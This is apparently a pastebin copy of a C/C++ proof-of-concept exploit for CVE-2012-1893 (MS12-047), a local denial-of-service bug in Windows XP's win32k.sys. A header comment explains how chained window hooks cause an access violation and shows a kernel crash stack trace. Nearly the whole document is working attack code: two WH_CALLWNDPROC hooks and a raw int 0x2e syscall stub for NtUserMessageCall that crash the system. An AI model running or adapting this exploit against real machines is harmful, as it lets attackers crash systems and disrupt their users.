Paste will expire never.
- #include "stdafx.h"
- /*
- CVE-2012-1893 MS12-047 LOCAL DoS PoC
- By @d_olex (aka Cr4sh)
- Vulnerability in win32k.sys allows us to call any next hook handler from the
- win32k!fnHkINLPCWPRETEXSTRUCT() or win32k!fnHkINLPCWPEXSTRUCT() in unsafe way.
- Since win32k doesn't checks the next hook type -- access violation
- occurs when we trying to call the next WH_CALLWNDPROC hook with the arguments
- from the previous WH_CALLWNDPROCRET hook:
- =====================================================================
- Access violation - code c0000005 (!!! second chance !!!)
- win32k!xxxHkCallHook+0x99:
- bf800564 f6402405 test byte ptr [eax+24h],5
- ChildEBP RetAddr
- b18d16ac bf8328c5 win32k!xxxHkCallHook+0x99
- b18d1724 bf8f6071 win32k!xxxCallHook2+0x25d
- b18d1740 bf932b6d win32k!xxxCallNextHookEx+0x2d
- b18d176c bf914749 win32k!fnHkINLPCWPRETEXSTRUCT+0x59
- b18d17d8 bf80eef6 win32k!NtUserfnINOUTLPPOINT5+0x5c
- b18d1810 8053d6d8 win32k!NtUserMessageCall+0xae
- b18d1810 0042d65f nt!KiFastCallEntry+0xf8
- 0012fa80 0042d6d8 win32k_Hook!_NtUserMessageCall+0xf
- 0012fc7c 7e42b372 win32k_Hook!HookHandler_2+0x68
- */
- #define WND_CLASS "CVE-2012-1893"
- #define WND_TITLE "CVE-2012-1893"
- #define WND_W 500
- #define WND_H 500
- HINSTANCE m_hInstance = NULL;
- HWND m_hWnd = NULL;
- HHOOK m_hHook_1 = NULL;
- HHOOK m_hHook_2 = NULL;
- /*
- NtUserMessageCall service number for Windows XP, change it
- before running exploit on any others Windows versions.
- */
- DWORD SDT_NtUserMessageCall = 0x11cc;
- __declspec(naked) LRESULT WINAPI _NtUserMessageCall(
- HWND hwnd,
- UINT msg,
- WPARAM wParam,
- LPARAM lParam,
- ULONG_PTR xParam,
- DWORD xpfnProc,
- BOOL bAnsi)
- {
- __asm
- {
- mov eax, SDT_NtUserMessageCall
- test eax, eax
- jz _failed
- lea edx, [esp + 4]
- int 0x2e
- retn 0x1c
- _failed:
- mov eax, 0xc00000001
- retn 0x1c
- }
- }
- #define TRIGGER() \
- \
- /* Trigger the vulnerability */ \
- char Something[0x100]; \
- ZeroMemory(Something, sizeof(Something)); \
- _NtUserMessageCall(m_hWnd, 0x24, 0, (LPARAM)&Something, NULL, 17 - 6, FALSE);
- LRESULT CALLBACK HookHandler_1(int nCode, WPARAM wParam, LPARAM lParam)
- {
- TRIGGER();
- return CallNextHookEx(m_hHook_1, nCode, wParam, lParam);
- }
- LRESULT CALLBACK HookHandler_2(int nCode, WPARAM wParam, LPARAM lParam)
- {
- TRIGGER();
- return CallNextHookEx(m_hHook_2, nCode, wParam, lParam);
- }
- #define ID_SHOWMSG 1
- LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
- {
- switch (message)
- {
- case WM_CREATE:
- {
- m_hHook_1 = SetWindowsHookEx(
- WH_CALLWNDPROC,
- HookHandler_1,
- NULL,
- GetCurrentThreadId()
- );
- if (m_hHook_1 == NULL)
- {
- }
- m_hHook_2 = SetWindowsHookEx(
- WH_CALLWNDPROC,
- HookHandler_2,
- NULL,
- GetCurrentThreadId()
- );
- if (m_hHook_2 == NULL)
- {
- }
- break;
- }
- case WM_COMMAND:
- {
- switch (wParam)
- {
- case ID_SHOWMSG:
- MessageBoxA(0, __FUNCTION__, "", 0);
- break;
- }
- break;
- }
- case WM_DESTROY:
- PostQuitMessage(0);
- break;
- default:
- return DefWindowProc(hWnd, message, wParam, lParam);
- }
- return 0;
- }
- int _tmain(int argc, _TCHAR* argv[])
- {
- char Something[0x100];
- ZeroMemory(Something, sizeof(Something));
- _NtUserMessageCall(GetDesktopWindow(), 0x24, 0, (LPARAM)&Something, NULL, 17 - 6, FALSE);
- WNDCLASSEX wcex;
- ZeroMemory(&wcex, sizeof(wcex));
- wcex.cbSize = sizeof(WNDCLASSEX);
- m_hInstance = (HINSTANCE)GetModuleHandle(NULL);
- wcex.style = CS_HREDRAW | CS_VREDRAW;
- wcex.lpfnWndProc = WndProc;
- wcex.hInstance = m_hInstance;
- wcex.lpszClassName = _T(WND_CLASS);
- wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW + 1);
- // register window class
- if (RegisterClassEx(&wcex) == NULL)
- {
- goto end;
- }
- int x = (GetSystemMetrics(SM_CXSCREEN) - WND_W) / 2;
- int y = (GetSystemMetrics(SM_CYSCREEN) - WND_H) / 2;
- // create new empty window
- m_hWnd = CreateWindowEx(
- WS_EX_CLIENTEDGE,
- _T(WND_CLASS), _T(WND_TITLE),
- WS_OVERLAPPEDWINDOW,
- x, y, WND_W, WND_H,
- NULL, NULL,
- m_hInstance,
- NULL
- );
- if (m_hWnd)
- {
- ShowWindow(m_hWnd, SW_SHOWNORMAL);
- UpdateWindow(m_hWnd);
- // Main message loop
- MSG Msg;
- while (GetMessage(&Msg, NULL, 0, 0))
- {
- TranslateMessage(&Msg);
- DispatchMessage(&Msg);
- }
- ExitProcess(0);
- }
- else
- {
- }
- end:
- _getch();
- return 0;
- }
Editing is locked.